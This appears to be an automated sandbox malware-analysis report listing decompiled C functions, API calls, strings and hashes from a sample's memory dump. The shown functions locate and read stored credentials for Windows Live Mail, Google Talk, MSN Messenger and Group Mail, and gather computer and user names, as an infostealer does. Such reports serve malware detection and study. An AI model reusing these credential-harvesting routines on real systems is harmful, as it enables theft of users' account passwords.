                                                                                0x00410de5
                                                                                0x00410dea
                                                                                0x00410dfe
                                                                                0x00410e0c
                                                                                0x00410e14
                                                                                0x00410e16
                                                                                0x00410e20
                                                                                0x00410e22
                                                                                0x00410e22
                                                                                0x00410e20
                                                                                0x00410e2c
                                                                                0x00410e2d
                                                                                0x00410e31
                                                                                0x00410e32
                                                                                0x00410e37
                                                                                0x00410e3b
                                                                                0x00410e48
                                                                                0x00410e48
                                                                                0x00410e53

                                                                                APIs
                                                                                • memset.MSVCRT ref: 00410D3C
                                                                                  • Part of subcall function 00406734: strlen.MSVCRT ref: 00406736
                                                                                  • Part of subcall function 00406734: strlen.MSVCRT ref: 00406741
                                                                                  • Part of subcall function 00406734: strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758
                                                                                  • Part of subcall function 0040EE59: memset.MSVCRT ref: 0040EEAE
                                                                                  • Part of subcall function 0040EE59: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
                                                                                  • Part of subcall function 0040EE59: strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25
                                                                                • memset.MSVCRT ref: 00410DAA
                                                                                • memset.MSVCRT ref: 00410DC5
                                                                                  • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                • ExpandEnvironmentStringsA.KERNELBASE(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 00410DFE
                                                                                • strlen.MSVCRT ref: 00410E0C
                                                                                • _stricmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?,?), ref: 00410E32
                                                                                Strings
                                                                                • \Microsoft\Windows Live Mail, xrefs: 00410D81
                                                                                • Store Root, xrefs: 00410DD6
                                                                                • Software\Microsoft\Windows Live Mail, xrefs: 00410DDB
                                                                                • \Microsoft\Windows Mail, xrefs: 00410D5A
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$strlen$Close$EnvironmentExpandStrings_stricmpstrcatstrcpy
                                                                                • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                • API String ID: 4071991895-2578778931
                                                                                • Opcode ID: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
                                                                                • Instruction ID: 656a87abbde68b626b6b67706479efffa51c3f1aad4b8967eb2d69b922da332e
                                                                                • Opcode Fuzzy Hash: 446d342accadaa8f5357ef9c7141ad4d55f165afb8774a5b515e9d11a0344459
                                                                                • Instruction Fuzzy Hash: 3D318DB2548348ABD324E799DC46FCB77DC9BC4318F04482FF649D7182E678D68487AA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004037B1, Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 76%
                                                                                			E004037B1(void* __ecx, void* __edi, void* __fp0, intOrPtr _a4) {
				char _v276;
				char _v404;
				intOrPtr _v408;
				char _v792;
				intOrPtr _v796;
				char _v924;
				char _v936;
				void _v1959;
				char _v1960;
				void _v2983;
				char _v2984;
				void* __ebx;
				void* __esi;
				void* _t28;
				void* _t50;
				void* _t51;
				char* _t59;
				char* _t63;
				void* _t70;

				_t70 = __fp0;
				_t51 = __ecx;
				_v1960 = 0;
				memset( &_v1959, 0, 0x3ff);
				_v2984 = 0;
				memset( &_v2983, 0, 0x3ff);
				_t28 = E00410F79(_t51,  &_v2984,  &_v1960); // executed
				if(_t28 == 0) {
					return _t28;
				}
				E004021D8( &_v936);
				_push( &_v1960);
				_t50 = 0x7f;
				E004060D0(_t50,  &_v276);
				_t59 =  &_v404;
				E004060D0(_t50, _t59,  &_v2984);
				_v796 = 9;
				_v408 = 3;
				_t63 = strchr(_t59, 0x40);
				_push( &_v404);
				if(_t63 == 0) {
					if(strlen() + 0xa < 0) {
						sprintf( &_v792, "%s@yahoo.com",  &_v404);
					}
				} else {
					strcpy( &_v792, ??);
					 *_t63 = 0;
				}
				strcpy( &_v924,  &_v404);
				return E00402407( &_v936, _t70, _a4);
			}






















                                                                                0x004037b1
                                                                                0x004037b1
                                                                                0x004037cc
                                                                                0x004037d2
                                                                                0x004037e0
                                                                                0x004037e6
                                                                                0x004037fc
                                                                                0x00403803
                                                                                0x004038cc
                                                                                0x004038cc
                                                                                0x00403810
                                                                                0x0040381b
                                                                                0x0040381e
                                                                                0x00403825
                                                                                0x00403831
                                                                                0x00403837
                                                                                0x00403841
                                                                                0x0040384b
                                                                                0x0040385d
                                                                                0x00403868
                                                                                0x00403869
                                                                                0x00403889
                                                                                0x0040389e
                                                                                0x004038a3
                                                                                0x0040386b
                                                                                0x00403872
                                                                                0x00403879
                                                                                0x00403879
                                                                                0x004038b4
                                                                                0x00000000

                                                                                APIs
                                                                                • memset.MSVCRT ref: 004037D2
                                                                                • memset.MSVCRT ref: 004037E6
                                                                                  • Part of subcall function 00410F79: memset.MSVCRT ref: 00410F9B
                                                                                  • Part of subcall function 00410F79: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007
                                                                                  • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                  • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                • strchr.MSVCRT ref: 00403855
                                                                                • strcpy.MSVCRT(?,?,?,?,?), ref: 00403872
                                                                                • strlen.MSVCRT ref: 0040387E
                                                                                • sprintf.MSVCRT ref: 0040389E
                                                                                • strcpy.MSVCRT(?,?,?,?,?), ref: 004038B4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$strcpystrlen$Closememcpysprintfstrchr
                                                                                • String ID: %s@yahoo.com
                                                                                • API String ID: 1649821605-3288273942
                                                                                • Opcode ID: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
                                                                                • Instruction ID: 59c64947ec9ad5e5fa7ad27033647646f0aae9e06f6053b7dc62ef58ab254070
                                                                                • Opcode Fuzzy Hash: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
                                                                                • Instruction Fuzzy Hash: 592184B3D0412C6EDB21EB55DD41FDA77AC9F85308F0404EBB64DE6041E6B8AB848BA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004034CB, Relevance: 10.5, APIs: 4, Strings: 3, Instructions: 47stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004034CB(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void* __edi;
				void* __esi;
				void* _t15;
				void* _t23;
				char* _t28;

				_t23 = __ecx;
				_v532 = 0;
				memset( &_v531, 0, 0x104);
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t15 = E0040EBC1(_t23, 0x80000002, "Software\\Group Mail", "InstallPath",  &_v532, 0xfa); // executed
				if(_t15 != 0) {
					strcpy( &_v268,  &_v532);
					_t28 =  &_v268;
					E00405F1F(_t28);
					strcat(_t28, "fb.dat");
					return E004033D7(_t28, __fp0, _a4);
				}
				return _t15;
			}












                                                                                0x004034cb
                                                                                0x004034e4
                                                                                0x004034eb
                                                                                0x004034fa
                                                                                0x00403501
                                                                                0x00403521
                                                                                0x0040352b
                                                                                0x0040353c
                                                                                0x00403541
                                                                                0x00403547
                                                                                0x00403554
                                                                                0x00000000
                                                                                0x00403566
                                                                                0x00403569

                                                                                APIs
                                                                                • memset.MSVCRT ref: 004034EB
                                                                                • memset.MSVCRT ref: 00403501
                                                                                  • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                • strcpy.MSVCRT(00000000,00000000), ref: 0040353C
                                                                                  • Part of subcall function 00405F1F: strlen.MSVCRT ref: 00405F20
                                                                                  • Part of subcall function 00405F1F: strcat.MSVCRT(00000000,00413044,004062BF,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 00405F37
                                                                                • strcat.MSVCRT(00000000,fb.dat,00000000,00000000), ref: 00403554
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memsetstrcat$Closestrcpystrlen
                                                                                • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                • API String ID: 1387626053-966475738
                                                                                • Opcode ID: b4206de9c90982f9c66f6cfc9dc9c0c880768121677d473e1c5bd2e45b33c8fe
                                                                                • Instruction ID: 7ff2b4ee0b8a45595852750e2855a272ac8b2b1e575441dca18af6517dfb7442
                                                                                • Opcode Fuzzy Hash: b4206de9c90982f9c66f6cfc9dc9c0c880768121677d473e1c5bd2e45b33c8fe
                                                                                • Instruction Fuzzy Hash: 2E01FC72D8012C75D720E6669C46FDA766C8F64745F0004A6BA4AF20C2DAFCABD48B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040754D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 96%
                                                                                			E0040754D(void* __ecx, void* __eflags, int _a4, char _a8, char _a12, void _a13, char _a268, void _a269) {
				void* _v0;
				char _v4;
				long _t29;
				void* _t33;
				void* _t36;
				signed int _t54;
				void* _t56;
				void* _t57;
				void* _t58;

				_t50 = __ecx;
				E004118A0(0x1110, __ecx);
				E0040724C(_a4); // executed
				_t29 = E0040EB3F(0x80000001, "Software\\Google\\Google Talk\\Accounts",  &_v4);
				_t56 = (_t54 & 0xfffffff8) + 0xc;
				if(_t29 == 0) {
					_a4 = 0;
					_a12 = 0;
					memset( &_a13, 0, 0xff);
					_t57 = _t56 + 0xc;
					_t33 = E0040EC05(_v0, 0,  &_a12);
					while(1) {
						_t58 = _t57 + 0xc;
						if(_t33 != 0) {
							break;
						}
						_t36 = E0040EB3F(_v0,  &_a12,  &_a8);
						_t57 = _t58 + 0xc;
						if(_t36 == 0) {
							_a268 = 0;
							memset( &_a269, 0, 0xfff);
							E0040EB80(0xfff, _t50, _a8, "pw",  &_a268);
							_t57 = _t57 + 0x18;
							E00407406( &_a268, _a4,  &_a12);
							RegCloseKey(_v0);
						}
						_a4 = _a4 + 1;
						_t33 = E0040EC05(_v0, _a4,  &_a12);
					}
					_t29 = RegCloseKey(_v0);
				}
				return _t29;
			}












                                                                                0x0040754d
                                                                                0x00407558
                                                                                0x00407562
                                                                                0x00407576
                                                                                0x0040757b
                                                                                0x00407580
                                                                                0x00407593
                                                                                0x00407597
                                                                                0x0040759b
                                                                                0x004075a0
                                                                                0x004075ad
                                                                                0x00407642
                                                                                0x00407642
                                                                                0x00407647
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004075cb
                                                                                0x004075d0
                                                                                0x004075d5
                                                                                0x004075e5
                                                                                0x004075ec
                                                                                0x0040760a
                                                                                0x0040760f
                                                                                0x00407621
                                                                                0x0040762a
                                                                                0x0040762a
                                                                                0x0040762c
                                                                                0x0040763d
                                                                                0x0040763d
                                                                                0x00407651
                                                                                0x00407651
                                                                                0x00407658

                                                                                APIs
                                                                                  • Part of subcall function 0040724C: memset.MSVCRT ref: 004072AE
                                                                                  • Part of subcall function 0040724C: memset.MSVCRT ref: 004072C2
                                                                                  • Part of subcall function 0040724C: memset.MSVCRT ref: 004072DC
                                                                                  • Part of subcall function 0040724C: memset.MSVCRT ref: 004072F1
                                                                                  • Part of subcall function 0040724C: GetComputerNameA.KERNEL32 ref: 00407313
                                                                                  • Part of subcall function 0040724C: GetUserNameA.ADVAPI32(?,?), ref: 00407327
                                                                                  • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407346
                                                                                  • Part of subcall function 0040724C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040735B
                                                                                  • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407364
                                                                                  • Part of subcall function 0040724C: strlen.MSVCRT ref: 00407373
                                                                                  • Part of subcall function 0040724C: memcpy.MSVCRT ref: 00407385
                                                                                  • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                • memset.MSVCRT ref: 0040759B
                                                                                  • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32 ref: 0040EC28
                                                                                • memset.MSVCRT ref: 004075EC
                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 0040762A
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00407651
                                                                                Strings
                                                                                • Software\Google\Google Talk\Accounts, xrefs: 0040756C
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                                                                • String ID: Software\Google\Google Talk\Accounts
                                                                                • API String ID: 2959138223-1079885057
                                                                                • Opcode ID: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
                                                                                • Instruction ID: 125b9810afc719f5725a34431a69a8fbc80fc1372edd2e7206a69bc0ee1a9f38
                                                                                • Opcode Fuzzy Hash: a9382395aa04bc6a2dd49f4cc28a46152cbaa1b62cfbf9a84d5181dec9838710
                                                                                • Instruction Fuzzy Hash: 6A21887150820A6FD610EF51DC42DEBB7ECDF94344F00083AF945E1191E635D96D9BA7
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040A5AC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 64%
                                                                                			E0040A5AC(void* __eax) {
				void* __esi;
				_Unknown_base(*)()* _t26;
				void* _t31;
				intOrPtr _t34;
				char* _t44;
				void* _t45;
				intOrPtr* _t46;
				int _t47;

				_t45 = __eax;
				_t37 =  *((intOrPtr*)(__eax + 0x37c));
				_t47 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x37c)) + 0x30)) > 0) {
					do {
						_t31 = E00406DEB(_t47, _t37);
						_push(_t31);
						_push("/sort");
						L004115C4();
						if(_t31 == 0) {
							_t4 = _t47 + 1; // 0x1
							_t44 = E00406DEB(_t4,  *((intOrPtr*)(_t45 + 0x37c)));
							_t54 =  *_t44 - 0x7e;
							_t34 =  *((intOrPtr*)(_t45 + 0x370));
							if( *_t44 != 0x7e) {
								_push(0);
							} else {
								_push(1);
								_t44 = _t44 + 1;
							}
							_push(_t44);
							E0040A119(_t34, _t54);
						}
						_t37 =  *((intOrPtr*)(_t45 + 0x37c));
						_t47 = _t47 + 1;
					} while (_t47 <  *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x37c)) + 0x30)));
				}
				E00405E2C();
				 *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)) + 0x28)) = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)))) + 0x5c))();
				if(E00406DFB( *((intOrPtr*)(_t45 + 0x37c)), "/nosort") == 0xffffffff) {
					_t46 =  *((intOrPtr*)(_t45 + 0x370));
					if( *0x41748c == 0) {
						 *0x417490 =  *((intOrPtr*)(_t46 + 0x1ac));
						 *0x41748c = 1;
					}
					_t26 =  *((intOrPtr*)( *_t46 + 0x60))(E0040A0F3);
					qsort( *((intOrPtr*)( *_t46 + 0x64))(), 0,  *(_t46 + 0x28), _t26);
				}
				return SetCursor( *0x416b98);
			}











                                                                                0x0040a5af
                                                                                0x0040a5b1
                                                                                0x0040a5b9
                                                                                0x0040a5be
                                                                                0x0040a5c0
                                                                                0x0040a5c2
                                                                                0x0040a5c7
                                                                                0x0040a5c8
                                                                                0x0040a5cd
                                                                                0x0040a5d6
                                                                                0x0040a5de
                                                                                0x0040a5e6
                                                                                0x0040a5e8
                                                                                0x0040a5eb
                                                                                0x0040a5f1
                                                                                0x0040a5f8
                                                                                0x0040a5f3
                                                                                0x0040a5f3
                                                                                0x0040a5f5
                                                                                0x0040a5f5
                                                                                0x0040a5f9
                                                                                0x0040a5fa
                                                                                0x0040a5fa
                                                                                0x0040a5ff
                                                                                0x0040a605
                                                                                0x0040a606
                                                                                0x0040a5c0
                                                                                0x0040a60b
                                                                                0x0040a616
                                                                                0x0040a621
                                                                                0x0040a637
                                                                                0x0040a63f
                                                                                0x0040a645
                                                                                0x0040a64d
                                                                                0x0040a652
                                                                                0x0040a652
                                                                                0x0040a668
                                                                                0x0040a676
                                                                                0x0040a67b
                                                                                0x0040a68d

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Cursor_mbsicmpqsort
                                                                                • String ID: /nosort$/sort
                                                                                • API String ID: 882979914-1578091866
                                                                                • Opcode ID: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
                                                                                • Instruction ID: 1813cf3d9500be1981e9bba0c11058464626672cad6922460886ab76c06e8bc1
                                                                                • Opcode Fuzzy Hash: 37bac6c9d6653dd70bdeecbb298df2510de2a0ce3a9ae5c3ad425128252b2c66
                                                                                • Instruction Fuzzy Hash: 4921B071304601EFC719AF75C880A99B7A9BF08314B10017EF429A7291CB39A9628B8A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040EE59, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registrystringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 25%
                                                                                			E0040EE59(char* __edi, void* __esi) {
				void* _v8;
				char _v40;
				void _v299;
				char _v300;
				void* _t32;
				char* _t37;
				void* _t38;

				_t38 = __esi;
				_t37 = __edi;
				E0040EDAC();
				if( *0x41751c == 0 ||  *((intOrPtr*)(E00406278() + 0x10)) == 1 && (__esi == 0x19 || __esi == 0x17 || __esi == 0x16)) {
					_v300 = 0;
					memset( &_v299, 0, 0x103);
					if(_t38 == 0x19 || _t38 == 0x17 || _t38 == 0x16) {
						_push( &_v8);
						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
						_push(0x80000002);
					} else {
						_push( &_v8);
						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
						_push(0x80000001);
					}
					if(E0040EB3F() == 0) {
						E0040EDDB(_t38);
						E0040EB80(0x104,  &_v40, _v8,  &_v40,  &_v300);
						RegCloseKey(_v8);
					}
					strcpy(_t37,  &_v300);
					return 0 |  *_t37 != 0x00000000;
				} else {
					_t32 =  *0x41751c(0, _t37, _t38, 0); // executed
					return _t32;
				}
			}










                                                                                0x0040ee59
                                                                                0x0040ee59
                                                                                0x0040ee63
                                                                                0x0040ee70
                                                                                0x0040eea8
                                                                                0x0040eeae
                                                                                0x0040eeb9
                                                                                0x0040eec8
                                                                                0x0040eec9
                                                                                0x0040eece
                                                                                0x0040eed5
                                                                                0x0040eed8
                                                                                0x0040eed9
                                                                                0x0040eede
                                                                                0x0040eede
                                                                                0x0040eeed
                                                                                0x0040eef4
                                                                                0x0040ef0c
                                                                                0x0040ef17
                                                                                0x0040ef17
                                                                                0x0040ef25
                                                                                0x00000000
                                                                                0x0040ee8c
                                                                                0x0040ee90
                                                                                0x00000000
                                                                                0x0040ee90

                                                                                APIs
                                                                                  • Part of subcall function 0040EDAC: LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,73B74DE0,?,00000000), ref: 0040EDBA
                                                                                  • Part of subcall function 0040EDAC: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF
                                                                                • memset.MSVCRT ref: 0040EEAE
                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
                                                                                • strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25
                                                                                  • Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040EEC9, 0040EED9
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressCloseLibraryLoadProcVersionmemsetstrcpy
                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                • API String ID: 181880968-2036018995
                                                                                • Opcode ID: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
                                                                                • Instruction ID: b4f7ca4f0d473bdd6f3573a0ab4a655380742daec172f7a18688454dd959f7ad
                                                                                • Opcode Fuzzy Hash: f36eb23c2dc7077338fc74569912d0170d623695a7104f0b3b9fc9f5b09292aa
                                                                                • Instruction Fuzzy Hash: D711D871800219FADB24A656DC89DEF77BCDB04309F1008B7F91572191D63D9FA886DD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040396C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040396C(void* __eflags, void* __fp0, intOrPtr _a4) {
				char _v528;
				intOrPtr _v540;
				char _v796;
				char _v1052;
				void* _v1056;
				void* _v1060;
				int _v1064;
				void* __ebx;
				void* __esi;
				void* _t21;
				long _t23;
				void** _t24;
				long _t26;
				int _t32;
				void* _t52;

				_t52 = __fp0;
				_v540 = 0x412e80;
				E004046D7( &_v528);
				_t32 = 0;
				_v1052 = 0;
				_v796 = 0;
				_v1064 = 0;
				do {
					if(_v1064 != _t32) {
						__eflags = _v1064 - 1;
						if(__eflags != 0) {
							_t21 = E0040D5DB( &_v1052, __eflags); // executed
						} else {
							_t23 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MessengerService", _t32, 0x20019,  &_v1060); // executed
							__eflags = _t23;
							if(_t23 != 0) {
								goto L5;
							} else {
								_t24 =  &_v1060;
								goto L4;
							}
						}
					} else {
						_t26 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MSNMessenger", _t32, 0x20019,  &_v1056); // executed
						if(_t26 != 0) {
							L5:
							_t21 = 0;
						} else {
							_t24 =  &_v1056;
							L4:
							_t21 = E0040D4A6( &_v1052, _t24);
						}
					}
					_t32 = 0;
					if(_t21 != 0) {
						E004038CF(_t52, _a4,  &_v1052);
					}
					_v1064 = _v1064 + 1;
				} while (_v1064 <= 2);
				return E004047F1( &_v528);
			}


















                                                                                0x0040396c
                                                                                0x00403982
                                                                                0x0040398d
                                                                                0x00403998
                                                                                0x0040399a
                                                                                0x0040399e
                                                                                0x004039a5
                                                                                0x004039ae
                                                                                0x004039b2
                                                                                0x004039df
                                                                                0x004039e4
                                                                                0x00403a07
                                                                                0x004039e6
                                                                                0x004039f7
                                                                                0x004039f9
                                                                                0x004039fb
                                                                                0x00000000
                                                                                0x004039fd
                                                                                0x004039fd
                                                                                0x00000000
                                                                                0x004039fd
                                                                                0x004039fb
                                                                                0x004039b4
                                                                                0x004039c5
                                                                                0x004039c9
                                                                                0x004039db
                                                                                0x004039db
                                                                                0x004039cb
                                                                                0x004039cb
                                                                                0x004039cf
                                                                                0x004039d4
                                                                                0x004039d4
                                                                                0x004039c9
                                                                                0x00403a0c
                                                                                0x00403a10
                                                                                0x00403a1a
                                                                                0x00403a1a
                                                                                0x00403a1f
                                                                                0x00403a23
                                                                                0x00403a3c

                                                                                APIs
                                                                                  • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 004039C5
                                                                                  • Part of subcall function 0040D5DB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
                                                                                  • Part of subcall function 0040D5DB: strlen.MSVCRT ref: 0040D6B7
                                                                                  • Part of subcall function 0040D5DB: strcpy.MSVCRT(?,?), ref: 0040D6C8
                                                                                  • Part of subcall function 0040D5DB: LocalFree.KERNEL32(?), ref: 0040D6D5
                                                                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 004039F7
                                                                                Strings
                                                                                • Software\Microsoft\MessengerService, xrefs: 004039F1
                                                                                • Software\Microsoft\MSNMessenger, xrefs: 004039BF
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Openstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                                                • String ID: Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService
                                                                                • API String ID: 1910562259-1741179510
                                                                                • Opcode ID: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
                                                                                • Instruction ID: e1373b66f94ab8684edf5be4eb08dc620599410c0cc400d8dd4f2e2a864aae35
                                                                                • Opcode Fuzzy Hash: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
                                                                                • Instruction Fuzzy Hash: 4F11F6B1608345AEC320DF5188819ABBBEC9B84355F50893FF584A2081D338DA09CAAB
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040ED0B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040ED0B(unsigned int _a4, CHAR* _a8, CHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceA(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								 *0x417110 =  *0x417110 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}











                                                                                0x0040ed18
                                                                                0x0040ed1e
                                                                                0x0040ed22
                                                                                0x0040ed2f
                                                                                0x0040ed33
                                                                                0x0040ed39
                                                                                0x0040ed41
                                                                                0x0040ed44
                                                                                0x0040ed4c
                                                                                0x0040ed50
                                                                                0x0040ed53
                                                                                0x0040ed56
                                                                                0x0040ed58
                                                                                0x0040ed58
                                                                                0x0040ed5c
                                                                                0x0040ed5f
                                                                                0x0040ed6f
                                                                                0x0040ed71
                                                                                0x0040ed75
                                                                                0x0040ed75
                                                                                0x0040ed79
                                                                                0x0040ed83
                                                                                0x0040ed83
                                                                                0x0040ed4c
                                                                                0x0040ed41
                                                                                0x0040ed88
                                                                                0x0040ed8e

                                                                                APIs
                                                                                • FindResourceA.KERNEL32(?,?,?), ref: 0040ED18
                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040ED29
                                                                                • LoadResource.KERNEL32(?,00000000), ref: 0040ED39
                                                                                • LockResource.KERNEL32(00000000), ref: 0040ED44
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID:
                                                                                • API String ID: 3473537107-0
                                                                                • Opcode ID: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
